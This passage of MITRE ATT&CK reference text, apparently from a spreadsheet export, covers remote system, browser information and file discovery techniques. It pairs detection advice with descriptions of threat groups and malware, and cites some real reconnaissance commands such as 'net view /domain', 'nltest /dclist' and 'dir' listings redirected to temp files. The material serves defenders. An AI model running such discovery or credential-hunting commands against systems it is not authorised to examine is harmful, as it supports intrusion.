[Wizard Spider](https://attack.mitre.org/groups/G0102) has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also used [AdFind](https://attack.mitre.org/software/S0552), &lt;code&gt;nltest/dclist&lt;/code&gt;, and PowerShell script Get-DataInfo.ps1 to enumerate domain computers, including the domain controller.(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: CrowdStrike Grim Spider May 2019)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: DFIR Ryuk's Return October 2020)(Citation: Mandiant FIN12 Oct 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) uses scripts to enumerate IP ranges on the victim network. [menuPass](https://attack.mitre.org/groups/G0045) has also issued the command &lt;code&gt;net view /domain&lt;/code&gt; to a [PlugX](https://attack.mitre.org/software/S0013) implant to gather information about remote systems on the network.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: FireEye APT10 April 2017)
AdFind
[AdFind](https://attack.mitre.org/software/S0552) has the ability to query Active Directory for computers.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: Cybereason Bumblebee August 2022)
Arp
[Arp](https://attack.mitre.org/software/S0099) can be used to display a host's ARP cache, which may include address resolutions for remote systems.(Citation: TechNet Arp)(Citation: Palo Alto ARP)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can use a PowerShell object such as, `System.Net.NetworkInformation.Ping` to ping a computer.(Citation: BitDefender BADHATCH Mar 2021)
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) can enumerate and map ICS-specific systems in victim environments.(Citation: Gigamon Berserk Bear October 2021)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can enumerate remote systems using &lt;code&gt; Net View&lt;/code&gt;.(Citation: Cybereason Bazar July 2020)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) can use &lt;code&gt;net view&lt;/code&gt; to discover remote systems.(Citation: Crowdstrike Indrik November 2018)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) can use LDAP queries to connect to AD and iterate over connected workstations.(Citation: Check Point Black Basta October 2022)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can broadcasts NetBIOS Name Service (NBNC) messages to search for servers connected to compromised networks.(Citation: Microsoft BlackCat Jun 2022)
BloodHound
[BloodHound](https://attack.mitre.org/software/S0521) can enumerate and collect the properties of domain computers, including domain controllers.(Citation: CrowdStrike BloodHound April 2018)
Carbon
[Carbon](https://attack.mitre.org/software/S0335) uses the &lt;code&gt;net view&lt;/code&gt; command.(Citation: GovCERT Carbon May 2016)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) runs the &lt;code&gt;net view&lt;/code&gt; command
Conti
[Conti](https://attack.mitre.org/software/S0575) has the ability to discover hosts on a target network.(Citation: CrowdStrike Wizard Spider October 2020)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can discover active IP addresses, along with the machine name, within a targeted network.(Citation: CME Github September 2018)
DRATzarus
[DRATzarus](https://attack.mitre.org/software/S0694) can search for other machines connected to compromised host and attempt to map the network.(Citation: ClearSky Lazarus Aug 2020)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) can use the ARP table to find remote hosts to scan.(Citation: Fortinet Diavol July 2021) 
Epic
[Epic](https://attack.mitre.org/software/S0091) uses the &lt;code&gt;net view&lt;/code&gt; command on the victim’s machine.(Citation: Kaspersky Turla)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute &lt;code&gt;net view&lt;/code&gt; on a targeted system.(Citation: NTT Security Flagpro new December 2021) 
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) can collect information about hosts on the victim network.(Citation: Kaspersky APT Trends Q1 2020)
HermeticWizard
[HermeticWizard](https://attack.mitre.org/software/S0698) can find machines on the local network by gathering known local IP addresses through `DNSGetCacheDataTable`, `GetIpNetTable`,`WNetOpenEnumW(RESOURCE_GLOBALNET, RESOURCETYPE_ANY)`,`NetServerEnum`,`GetTcpTable`, and `GetAdaptersAddresses.`(Citation: ESET Hermetic Wizard March 2022)
Industroyer
[Industroyer](https://attack.mitre.org/software/S0604) can enumerate remote computers in the compromised network.(Citation: ESET Industroyer)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) has used a script to parse files like &lt;code&gt;/etc/hosts&lt;/code&gt; and SSH &lt;code&gt;known_hosts&lt;/code&gt; to discover remote systems.(Citation: Aqua Kinsing April 2020)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of available servers with the command &lt;code&gt;net view&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)
MURKYTOP
[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to identify remote hosts on connected networks.(Citation: FireEye Periscope March 2018)
NBTscan
[NBTscan](https://attack.mitre.org/software/S0590) can list NetBIOS computer names.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)	
Net
Commands such as &lt;code&gt;net view&lt;/code&gt; can be used in [Net](https://attack.mitre.org/software/S0039) to gather information about available remote systems.(Citation: Savill 1999)
Nltest
[Nltest](https://attack.mitre.org/software/S0359) may be used to enumerate remote domain controllers using options such as &lt;code&gt;/dclist&lt;/code&gt; and &lt;code&gt;/dsgetdc&lt;/code&gt;.(Citation: Nltest Manual)
OSInfo
[OSInfo](https://attack.mitre.org/software/S0165) performs a connection test to discover remote systems in the network(Citation: Symantec Buckeye)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) uses [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to enumerate all systems in the network.(Citation: Talos Olympic Destroyer 2018)
Ping
[Ping](https://attack.mitre.org/software/S0097) can be used to identify remote systems within a network.(Citation: TechNet Ping)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) used Nmap for remote system discovery.(Citation: Talos PoetRAT April 2020)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can identify remote systems through the &lt;code&gt;net view&lt;/code&gt; command.(Citation: Crowdstrike Qakbot October 2020)(Citation: Kaspersky QakBot September 2021)(Citation: Trend Micro Black Basta October 2022)
RATANKBA
[RATANKBA](https://attack.mitre.org/software/S0241) runs the &lt;code&gt;net view /domain&lt;/code&gt; and &lt;code&gt;net view&lt;/code&gt; commands.(Citation: RATANKBA)
ROADTools
[ROADTools](https://attack.mitre.org/software/S0684) can enumerate Azure AD systems and devices.(Citation: Roadtools)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) can ping or traceroute a remote host.(Citation: Kaspersky ProjectSauron Technical Analysis)
SHOTPUT
[SHOTPUT](https://attack.mitre.org/software/S0063) has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.(Citation: Palo Alto CVE-2015-3113 July 2015)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can enumerate and collect the properties of domain computers.(Citation: GitHub SILENTTRINITY Modules July 2019)
Shamoon
[Shamoon](https://attack.mitre.org/software/S0140) scans the C-class subnet of the IPs on the victim's interfaces.(Citation: FireEye Shamoon Nov 2016)
SpicyOmelette
[SpicyOmelette](https://attack.mitre.org/software/S0646) can identify payment systems, payment gateways, and ATM systems in compromised environments.(Citation: Secureworks GOLD KINGSWOOD September 2018)
Sykipot
[Sykipot](https://attack.mitre.org/software/S0018) may use &lt;code&gt;net view /domain&lt;/code&gt; to display hostnames of available systems on a network.(Citation: AlienVault Sykipot 2011)
TAINTEDSCRIBE
The [TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) command and execution module can perform target system enumeration.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) can enumerate computers and network devices.(Citation: Cyberreason Anchor December 2019)
USBferry
[USBferry](https://attack.mitre.org/software/S0452) can use &lt;code&gt;net view&lt;/code&gt; to gather information about remote systems.(Citation: TrendMicro Tropic Trooper May 2020)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) scans its local network segment for remote systems to try to exploit and copy itself to.(Citation: SecureWorks WannaCry Analysis)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) can identify remote hosts on connected networks.(Citation: Fidelis njRAT June 2013)
yty
[yty](https://attack.mitre.org/software/S0248) uses the &lt;code&gt;net view&lt;/code&gt; command for discovery.(Citation: ASERT Donot March 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that could be taken to gather browser information, such as local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles) Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as Windows Management Instrumentation and PowerShell.
File Access
Monitor for unusual access to stored browser data, such as local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles) Rather than viewing these events in isolation, this activity may highlight a chain of behavior that could lead to other activities, such as Collection and Exfiltration.
Process Creation
Monitor for processes with arguments that may be associated with gathering browser information, such as local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has collected browser bookmark information to learn more about compromised hosts, obtain personal information about users, and acquire details about internal network resources.(Citation: CISA AA20-239A BeagleBoyz August 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;type \\&lt;hostname&gt;\c$\Users\&lt;username&gt;\Favorites\Links\Bookmarks bar\Imported From IE\*citrix*&lt;/code&gt; for bookmark discovery.(Citation: NCC Group Chimera January 2021)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used Google Chrome bookmarks to identify internal resources and assets.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
Calisto
[Calisto](https://attack.mitre.org/software/S0274) collects information on bookmarks from Google Chrome.(Citation: Securelist Calisto July 2018)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can retrieve browser history.(Citation: Prevailion DarkWatchman 2021)
Dtrack
[Dtrack](https://attack.mitre.org/software/S0567) can retrieve browser history.(Citation: Securelist Dtrack)(Citation: CyberBit Dtrack)
Empire
[Empire](https://attack.mitre.org/software/S0363) has the ability to gather browser data such as bookmarks and visited sites.(Citation: Github PowerShell Empire)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) can retrieve browser history and database files.(Citation: Threatpost Lizar May 2021)(Citation: BiZone Lizar May 2021) 
Machete
[Machete](https://attack.mitre.org/software/S0409) retrieves the user profile data (e.g., browsers) from Chrome and Firefox browsers.(Citation: ESET Machete July 2019) 
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can collect the contents of the `%USERPROFILE%\AppData\Local\Google\Chrome\User Data\LocalState` file.(Citation: SentinelLabs Metador Sept 2022) 
MobileOrder
[MobileOrder](https://attack.mitre.org/software/S0079) has a command to upload to its C2 server victim browser bookmarks.(Citation: Scarlet Mimic Jan 2016)
PowerLess
[PowerLess](https://attack.mitre.org/software/S1012) has a browser info stealer module that can read Chrome and Edge browser database files.(Citation: Cybereason PowerLess February 2022)
SUGARDUMP
[SUGARDUMP](https://attack.mitre.org/software/S1042) has collected browser bookmark and history information.(Citation: Mandiant UNC3890 Aug 2022)
</t>
  </si>
  <si>
    <t>Command Execution
Monitor executed commands and arguments that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.
OS API Execution
Monitor for API calls that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Process Creation
Monitor newly executed processes that may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.(Citation: DFIR Conti Bazar Nov 2021)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used [zwShell](https://attack.mitre.org/software/S0350) to establish full remote control of the connected machine and browse the victim file system.(Citation: McAfee Night Dragon)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used `dir c:\\` to search for files.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) conducted word searches within documents on a compromised host in search of security and financial matters.(Citation: ClearSky Lazarus Aug 2020)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used a malicious DLL to search for files with specific keywords.(Citation: McAfee Honeybee)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors gathered a recursive directory listing to find files and directories of interest.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) obtained information about the configured Exchange virtual directory using `Get-WebServicesVirtualDirectory`.(Citation: Volexity SolarWinds)
APT18
[APT18](https://attack.mitre.org/groups/G0026) can list files information for specific directories.(Citation: PaloAlto DNS Requests May 2016)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used [Forfiles](https://attack.mitre.org/software/S0193) to locate PDF, Excel, and Word documents during collection. The group also searched a compromised DCCC computer for specific terms.(Citation: Überwachung APT28 Forfiles June 2015)(Citation: DOJ GRU Indictment Jul 2018)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has a tool that looks for files and directories on the local file system.(Citation: FireEye Clandestine Fox)(Citation: evolution of pirpi)
APT32
[APT32](https://attack.mitre.org/groups/G0050)'s backdoor possesses the capability to list files and directories on a machine. (Citation: ESET OceanLotus Mar 2019)	
APT38
[APT38](https://attack.mitre.org/groups/G0082) have enumerated files and directories, or searched in specific locations within a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used tools with the ability to search for files on a compromised host.(Citation: FBI FLASH APT39 September 2020)
APT41
[APT41](https://attack.mitre.org/groups/G0096) has executed &lt;code&gt;file /bin/pwd&lt;/code&gt; on exploited victims, perhaps to return architecture related information.(Citation: FireEye APT41 March 2020)
Aoqin Dragon
[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has run scripts to identify file formats including Microsoft Word.(Citation: SentinelOne Aoqin Dragon June 2022)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has collected a list of files from the victim and uploaded it to its C2 server, and then created a new list of specific files to steal.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has utilized multiple commands to identify data of interest in file and directory listings.(Citation: NCC Group Chimera January 2021)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has used a file stealer that checks the Document, Downloads, Desktop, and Picture folders for documents and images with specific extensions.(Citation: TrendMicro Confucius APT Aug 2021)
Dark Caracal
[Dark Caracal](https://attack.mitre.org/groups/G0070) collected file listings of all default Windows directories.(Citation: Lookout Dark Caracal Jan 2018)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has used malware that searched for files with specific patterns.(Citation: Microsoft DUBNIUM July 2016)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used a batch script to gather folder and file names from victim hosts.(Citation: US-CERT TA18-074A)(Citation: Gigamon Berserk Bear October 2021)(Citation: CISA AA20-296A Berserk Bear December 2020)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has used the Windows `dir` command to enumerate files and directories in a victim's network.(Citation: Mandiant FIN13 Aug 2022)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used WizTree to obtain network files and directory listings.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) macros can scan for Microsoft Word and Excel files to inject with additional malicious macros. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also used its backdoors to automatically list interesting files (such as Office documents) found on a system.(Citation: ESET Gamaredon June 2020)(Citation: Unit 42 Gamaredon February 2022)	
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has searched file contents on a compromised host.(Citation: Rapid7 HAFNIUM Mar 2021)
Inception
[Inception](https://attack.mitre.org/groups/G0100) used a file listing plugin to collect information about file and directories both on local and remote drives.(Citation: Symantec Inception Framework March 2018)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) uses command-line interaction to search files and directories.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has the ability to enumerate all files and directories on an infected system.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) malware can use a common function to identify target files by their extension, and some also enumerate files and directories, including a Destover-like variant that lists files and gathers information for all drives.(Citation: Novetta Blockbuster)(Citation: McAfee GhostSecret)(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) used a tool called MailSniper to search for files on the desktop and another utility called Sobolsoft to extract attachments from EML files.(Citation: Symantec Leafminer July 2018)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has used malware that scans for files in the Documents, Desktop, and Download folders and in other drives.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents.(Citation: Unit 42 Magic Hound Feb 2017)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that checked if the ProgramData folder had folders or files with the keywords "Kasper," "Panda," or "ESET."(Citation: Securelist MuddyWater Oct 2018)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has searched the entire target system for DOC, DOCX, PPT, PPTX, XLS, XLSX, and PDF files.(Citation: Avira Mustang Panda January 2020)
Patchwork
A [Patchwork](https://attack.mitre.org/groups/G0040) payload has searched all fixed drives on the victim for files matching a specified list of extensions.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has enumerated files on a compromised host.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Dragos Crashoverride 2018)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used malware to collect information on files and directories.(Citation: ATT Sidewinder January 2021)
Sowbug
[Sowbug](https://attack.mitre.org/groups/G0054) identified and extracted all Word documents on a server by using a command containing * .doc and *.docx. The actors also searched for documents based on a specific date range and attempted to identify all installed software on a victim.(Citation: Symantec Sowbug Nov 2017)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has used a script that checks `/proc/*/environ` for environment variables related to AWS.(Citation: Cisco Talos Intelligence Group)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has monitored files' modified time.(Citation: TrendMicro Tropic Trooper May 2020)	
Turla
[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover files in specific locations on the hard disk %TEMP% directory, the current user's desktop, the Program Files directory, and Recent.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also searched for files matching the &lt;code&gt;lPH*.dll&lt;/code&gt; pattern.(Citation: ESET Turla PowerShell May 2019)
Windigo
[Windigo](https://attack.mitre.org/groups/G0124) has used a script to check for the presence of files created by OpenSSH backdoors.(Citation: ESET ForSSHe December 2018)
Winnti Group
[Winnti Group](https://attack.mitre.org/groups/G0044) has used a program named ff.exe to search for specific documents on compromised hosts.(Citation: Kaspersky Winnti April 2013)
admin@338
[admin@338](https://attack.mitre.org/groups/G0018) actors used the following commands after exploiting a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to obtain information about files and directories: &lt;code&gt;dir c:\ &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;dir "c:\Documents and Settings" &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;dir "c:\Program Files\" &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;dir d:\ &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has searched compromised systems for folders of interest including those related to HR, audit and expense, and meeting memos.(Citation: Symantec Cicada November 2020)
3PARA RAT
[3PARA RAT](https://attack.mitre.org/software/S0066) has a command to retrieve metadata for files on disk as well as a command to list the current working directory.(Citation: CrowdStrike Putter Panda)
4H RAT
[4H RAT](https://attack.mitre.org/software/S0065) has the capability to obtain file and directory listings.(Citation: CrowdStrike Putter Panda)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can list files and directories.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)
Action RAT
[Action RAT](https://attack.mitre.org/software/S1028) has the ability to collect drive and file information on an infected machine.(Citation: MalwareBytes SideCopy Dec 2021)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has searched for folders associated with antivirus software.(Citation: Korean FSI TA505 2020)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to search for .txt, .ppt, .hwp, .pdf, and .doc files in specified directories.(Citation: Malwarebytes Kimsuky June 2021)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to gather metadata from a file and to search for file and directory names.(Citation: CheckPoint Naikon May 2020)
Attor
[Attor](https://attack.mitre.org/software/S0438) has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files.(Citation: ESET Attor Oct 2019)
AuditCred
[AuditCred](https://attack.mitre.org/software/S0347) can search through folders and files on the system.(Citation: TrendMicro Lazarus Nov 2018)
AutoIt backdoor
[AutoIt backdoor](https://attack.mitre.org/software/S0129) is capable of identifying documents on the victim with the following extensions: .doc; .pdf, .csv, .ppt, .docx, .pst, .xls, .xlsx, .pptx, and .jpeg.(Citation: Forcepoint Monsoon)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) has searched for specific files prior to encryption.(Citation: Arxiv Avaddon Feb 2021)
Avenger
[Avenger](https://attack.mitre.org/software/S0473) has the ability to browse files in directories such as Program Files and the Desktop.(Citation: Trend Micro Tick November 2019) 
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has searched for files and directories on a compromised network.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can recursively search for files in folders and collects files from the desktop with certain extensions.(Citation: Unit42 Azorult Nov 2018)
BACKSPACE
[BACKSPACE](https://attack.mitre.org/software/S0031) allows adversaries to search for files.(Citation: FireEye APT30)
BADFLICK
[BADFLICK](https://attack.mitre.org/software/S0642) has searched for files on the infected host.(Citation: Accenture MUDCARP March 2019)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) identifies files with certain extensions from USB devices, then copies them to a predefined directory.(Citation: TrendMicro Patchwork Dec 2017)
BBSRAT
[BBSRAT](https://attack.mitre.org/software/S0127) can list file and directory information.(Citation: Palo Alto Networks BBSRAT)
BLACKCOFFEE
[BLACKCOFFEE](https://attack.mitre.org/software/S0069) has the capability to enumerate files.(Citation: FireEye APT17)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) can search, read, write, move, and execute files.(Citation: US-CERT BLINDINGCAN Aug 2020)(Citation: NHS UK BLINDINGCAN Aug 2020)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) can enumerate files and collect associated metadata.(Citation: Volexity InkySquid BLUELIGHT August 2021)
Babuk
[Babuk](https://attack.mitre.org/software/S0638) has the ability to enumerate files on a targeted system.(Citation: McAfee Babuk February 2021)(Citation: Trend Micro Ransomware February 2021)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has used &lt;code&gt;dir&lt;/code&gt; to search for "programfiles" and "appdata".(Citation: Unit42 BabyShark Feb 2019)	
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has the ability to identify folders and files related to previous infections.(Citation: Unit 42 BackConfig May 2020)	
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files.(Citation: Symantec Dragonfly)
BadPatch
[BadPatch](https://attack.mitre.org/software/S0337) searches for files with specific file extensions.(Citation: Unit 42 BadPatch Oct 2017)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has a command to list files on a system.(Citation: CheckPoint Bandook Nov 2020)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) searches for files on the victim's machine.(Citation: US-CERT Bankshot Dec 2017)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can enumerate the victim's desktop.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) can retrieve a file listing from the system.(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) 
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) can enumerate specific files for encryption.(Citation: Cyble Black Basta May 2022)(Citation: Avertium Black Basta June 2022)(Citation: NCC Group Black Basta June 2022)(Citation: Uptycs Black Basta ESXi June 2022)(Citation: Deep Instinct Black Basta August 2022)(Citation: Palo Alto Networks Black Basta August 2022)(Citation: Trend Micro Black Basta Spotlight September 2022)(Citation: Check Point Black Basta October 2022)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can enumerate files for encryption.(Citation: Microsoft BlackCat Jun 2022)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) gathers a list of installed apps from the uninstall program Registry. It also gathers registered mail, browser, and instant messaging clients from the Registry. [BlackEnergy](https://attack.mitre.org/software/S0089) has searched for given file types.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)
BlackMould
[BlackMould](https://attack.mitre.org/software/S0564) has the ability to find files on the targeted system.(Citation: Microsoft GALLIUM December 2019)
BoomBox
[BoomBox](https://attack.mitre.org/software/S0635) can search for specific files and directories on a machine.(Citation: MSTIC Nobelium Toolset May 2021)
BoxCaon
[BoxCaon](https://attack.mitre.org/software/S0651) has searched for files on the system, such as documents located in the desktop folder.(Citation: Checkpoint IndigoZebra July 2021)
Brave Prince
[Brave Prince](https://attack.mitre.org/software/S0252) gathers file and directory information from the victim’s machine.(Citation: McAfee Gold Dragon)
CHOPSTICK
An older version of [CHOPSTICK](https://attack.mitre.org/software/S0023) has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o.(Citation: ESET Sednit Part 2)
CORALDECK
[CORALDECK](https://attack.mitre.org/software/S0212) searches for specified files.(Citation: FireEye APT37 Feb 2018)
CaddyWiper
[CaddyWiper](https://attack.mitre.org/software/S0693) can enumerate all files and directories on a compromised host.(Citation: Malwarebytes IssacWiper CaddyWiper March 2022 )
Cannon
[Cannon](https://attack.mitre.org/software/S0351) can obtain victim drive information as well as a list of folders in C:\Program Files.(Citation: Unit42 Cannon Nov 2018)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) checks its current working directory upon execution and also contains watchdog functionality that ensures its executable is located in the correct path (else it will rewrite the payload).(Citation: PaloAlto CardinalRat Apr 2017)
Caterpillar WebShell
[Caterpillar WebShell](https://attack.mitre.org/software/S0572) can search for files in directories.(Citation: ClearSky Lebanese Cedar Jan 2021) 
ChChes
[ChChes](https://attack.mitre.org/software/S0144) collects the victim's %TEMP% directory path and version of Internet Explorer.(Citation: FireEye APT10 April 2017)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can enumerate drives and list the contents of the C: drive on a victim's computer.(Citation: Check Point APT35 CharmPower January 2022)
China Chopper
[China Chopper](https://attack.mitre.org/software/S0020)'s server component can list directory contents.(Citation: FireEye Periscope March 2018)(Citation: Rapid7 HAFNIUM Mar 2021)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) can browse directories on a compromised host.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
Clop
[Clop](https://attack.mitre.org/software/S0611) has searched folders and subfolders for files to encrypt.(Citation: Mcafee Clop Aug 2019)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can explore files on a compromised system.(Citation: Cobalt Strike Manual 4.3 November 2020)
Conti
[Conti](https://attack.mitre.org/software/S0575) can discover files on a local system.(Citation: CarbonBlack Conti July 2020)
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) has looked for files in the user's home directory with "wallet" in their name using &lt;code&gt;find&lt;/code&gt;.(Citation: Unit42 CookieMiner Jan 2019)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) searches attached and mounted drives for file extensions and keywords that match a predefined list.(Citation: F-Secure Cosmicduke)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can discover specified filetypes and log files on a targeted system.(Citation: CME Github September 2018)
CreepyDrive
[CreepyDrive](https://attack.mitre.org/software/S1023) can specify the local file path to upload files from.(Citation: Microsoft POLONIUM June 2022)
Crimson
